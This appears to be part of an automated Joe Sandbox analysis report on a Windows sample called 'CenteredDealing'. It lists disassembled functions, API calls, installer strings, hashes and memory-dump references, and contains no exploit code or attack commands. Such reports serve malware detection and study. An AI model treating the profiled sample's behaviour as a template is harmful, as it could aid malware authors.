                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                                                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                        • String ID: 82D$: Completed$@rD$A
                                                                                                                                                                                                                                                                        • API String ID: 3347642858-2952707010
                                                                                                                                                                                                                                                                        • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                                                                                                        Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                                                                                                        Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • \*.*, xrefs: 00406D03
                                                                                                                                                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                                                                                                        • API String ID: 2035342205-3294556389
                                                                                                                                                                                                                                                                        • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                                                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                                                                                                                                        Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                        • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                                                                                                                                                        Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                                                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                        • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                                                                                                                        Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                                                                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                                                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                                                                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                                                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                        • String ID: @%F$N$open
                                                                                                                                                                                                                                                                        • API String ID: 3928313111-3849437375
                                                                                                                                                                                                                                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                                                                                                        Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                                                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                                                                                                        Strings
